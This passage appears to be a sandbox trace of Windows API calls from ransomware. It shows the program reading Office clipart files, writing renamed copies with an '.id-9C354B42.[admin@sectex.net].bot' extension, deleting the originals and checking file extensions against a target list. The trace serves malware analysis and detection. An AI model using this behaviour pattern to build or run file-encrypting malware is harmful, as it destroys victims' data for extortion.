	[0152.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0152.540] GetLastError () returned 0x0
	[0152.540] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4ed3, lpOverlapped=0x0) returned 1
	[0152.542] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4ee0, lpOverlapped=0x0) returned 1
	[0152.543] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.543] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.543] SetEndOfFile (hFile=0x31c) returned 1
	[0152.543] CloseHandle (hObject=0x31c) returned 1
	[0152.543] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.543] SetEndOfFile (hFile=0x3e8) returned 1
	[0152.546] CloseHandle (hObject=0x3e8) returned 1
	[0152.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.546] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg")) returned 1
	[0152.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.547] lstrlenW (lpString=".doc") returned 4
	[0152.547] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.547] lstrlenW (lpString=".docx") returned 5
	[0152.547] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0152.547] lstrlenW (lpString=".pdf") returned 4
	[0152.547] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.547] lstrlenW (lpString=".xls") returned 4
	[0152.547] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.547] lstrlenW (lpString=".xlsx") returned 5
	[0152.547] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0152.547] lstrlenW (lpString=".ppt") returned 4
	[0152.547] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.547] lstrlenW (lpString=".zip") returned 4
	[0152.547] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.547] lstrlenW (lpString=".rar") returned 4
	[0152.547] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.547] lstrlenW (lpString=".bz2") returned 4
	[0152.547] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.547] lstrlenW (lpString=".7z") returned 3
	[0152.547] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.547] lstrlenW (lpString=".dbf") returned 4
	[0152.548] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.548] lstrlenW (lpString=".1cd") returned 4
	[0152.548] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.548] lstrlenW (lpString=".jpg") returned 4
	[0152.548] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.548] lstrlenW (lpString=".doc") returned 4
	[0152.548] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.548] lstrlenW (lpString=".docx") returned 5
	[0152.548] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0152.548] lstrlenW (lpString=".pdf") returned 4
	[0152.548] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.548] lstrlenW (lpString=".xls") returned 4
	[0152.548] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.548] lstrlenW (lpString=".xlsx") returned 5
	[0152.548] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0152.548] lstrlenW (lpString=".ppt") returned 4
	[0152.548] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.548] lstrlenW (lpString=".zip") returned 4
	[0152.548] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.548] lstrlenW (lpString=".rar") returned 4
	[0152.548] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.548] lstrlenW (lpString=".bz2") returned 4
	[0152.548] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.548] lstrlenW (lpString=".7z") returned 3
	[0152.548] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.549] lstrlenW (lpString=".dbf") returned 4
	[0152.549] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.549] lstrlenW (lpString=".1cd") returned 4
	[0152.549] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63
	[0152.549] lstrlenW (lpString=".jpg") returned 4
	[0152.549] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.549] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.549] lstrlenW (lpString="J0099169.WMF") returned 12
	[0152.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099169.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.549] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=10192) returned 1
	[0152.550] CloseHandle (hObject=0x3e8) returned 1
	[0152.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099169.wmf")) returned 0x20
	[0152.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099169.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099169.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.550] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.550] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099169.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0152.551] GetLastError () returned 0x0
	[0152.551] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x27d0, lpOverlapped=0x0) returned 1
	[0152.553] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x27e0, lpOverlapped=0x0) returned 1
	[0152.554] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.554] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.554] SetEndOfFile (hFile=0x31c) returned 1
	[0152.554] CloseHandle (hObject=0x31c) returned 1
	[0152.554] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.554] SetEndOfFile (hFile=0x3e8) returned 1
	[0152.556] CloseHandle (hObject=0x3e8) returned 1
	[0152.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.556] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099169.wmf")) returned 1
	[0152.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.557] lstrlenW (lpString=".doc") returned 4
	[0152.557] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.557] lstrlenW (lpString=".docx") returned 5
	[0152.557] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0152.557] lstrlenW (lpString=".pdf") returned 4
	[0152.557] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.557] lstrlenW (lpString=".xls") returned 4
	[0152.557] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.557] lstrlenW (lpString=".xlsx") returned 5
	[0152.557] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0152.557] lstrlenW (lpString=".ppt") returned 4
	[0152.557] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.557] lstrlenW (lpString=".zip") returned 4
	[0152.558] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.558] lstrlenW (lpString=".rar") returned 4
	[0152.558] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.558] lstrlenW (lpString=".bz2") returned 4
	[0152.558] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.558] lstrlenW (lpString=".7z") returned 3
	[0152.558] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.558] lstrlenW (lpString=".dbf") returned 4
	[0152.558] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.558] lstrlenW (lpString=".1cd") returned 4
	[0152.558] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.558] lstrlenW (lpString=".jpg") returned 4
	[0152.558] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.558] lstrlenW (lpString=".doc") returned 4
	[0152.558] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.558] lstrlenW (lpString=".docx") returned 5
	[0152.558] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0152.558] lstrlenW (lpString=".pdf") returned 4
	[0152.558] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.558] lstrlenW (lpString=".xls") returned 4
	[0152.558] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.558] lstrlenW (lpString=".xlsx") returned 5
	[0152.558] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0152.558] lstrlenW (lpString=".ppt") returned 4
	[0152.558] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.559] lstrlenW (lpString=".zip") returned 4
	[0152.559] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.559] lstrlenW (lpString=".rar") returned 4
	[0152.559] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.559] lstrlenW (lpString=".bz2") returned 4
	[0152.559] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.559] lstrlenW (lpString=".7z") returned 3
	[0152.559] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.559] lstrlenW (lpString=".dbf") returned 4
	[0152.559] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.559] lstrlenW (lpString=".1cd") returned 4
	[0152.559] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned 63
	[0152.559] lstrlenW (lpString=".jpg") returned 4
	[0152.559] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.559] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.559] lstrlenW (lpString="J0099170.WMF") returned 12
	[0152.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.562] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=24292) returned 1
	[0152.562] CloseHandle (hObject=0x3e8) returned 1
	[0152.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf")) returned 0x20
	[0152.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.563] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.563] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0152.564] GetLastError () returned 0x0
	[0152.564] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x5ee4, lpOverlapped=0x0) returned 1
	[0153.092] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x5ef0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x5ef0, lpOverlapped=0x0) returned 1
	[0153.094] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.094] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.094] SetEndOfFile (hFile=0x31c) returned 1
	[0153.094] CloseHandle (hObject=0x31c) returned 1
	[0153.094] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.094] SetEndOfFile (hFile=0x3e8) returned 1
	[0153.096] CloseHandle (hObject=0x3e8) returned 1
	[0153.096] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.097] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf")) returned 1
	[0153.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.097] lstrlenW (lpString=".doc") returned 4
	[0153.097] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.097] lstrlenW (lpString=".docx") returned 5
	[0153.097] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0153.097] lstrlenW (lpString=".pdf") returned 4
	[0153.098] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.098] lstrlenW (lpString=".xls") returned 4
	[0153.098] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.098] lstrlenW (lpString=".xlsx") returned 5
	[0153.098] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0153.098] lstrlenW (lpString=".ppt") returned 4
	[0153.098] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.098] lstrlenW (lpString=".zip") returned 4
	[0153.098] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.098] lstrlenW (lpString=".rar") returned 4
	[0153.098] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.098] lstrlenW (lpString=".bz2") returned 4
	[0153.098] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.098] lstrlenW (lpString=".7z") returned 3
	[0153.098] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.098] lstrlenW (lpString=".dbf") returned 4
	[0153.098] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.098] lstrlenW (lpString=".1cd") returned 4
	[0153.098] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.098] lstrlenW (lpString=".jpg") returned 4
	[0153.098] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.098] lstrlenW (lpString=".doc") returned 4
	[0153.098] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.098] lstrlenW (lpString=".docx") returned 5
	[0153.099] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0153.099] lstrlenW (lpString=".pdf") returned 4
	[0153.099] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.099] lstrlenW (lpString=".xls") returned 4
	[0153.099] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.099] lstrlenW (lpString=".xlsx") returned 5
	[0153.099] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0153.099] lstrlenW (lpString=".ppt") returned 4
	[0153.099] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.099] lstrlenW (lpString=".zip") returned 4
	[0153.099] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.099] lstrlenW (lpString=".rar") returned 4
	[0153.099] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.099] lstrlenW (lpString=".bz2") returned 4
	[0153.099] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.099] lstrlenW (lpString=".7z") returned 3
	[0153.099] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.099] lstrlenW (lpString=".dbf") returned 4
	[0153.099] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.099] lstrlenW (lpString=".1cd") returned 4
	[0153.099] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned 63
	[0153.099] lstrlenW (lpString=".jpg") returned 4
	[0153.099] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.100] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0153.100] lstrlenW (lpString="J0099178.WMF") returned 12
	[0153.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099178.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.627] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3606) returned 1
	[0153.627] CloseHandle (hObject=0x3ac) returned 1
	[0153.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099178.wmf")) returned 0x20
	[0153.686] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099178.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099178.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.686] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.686] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
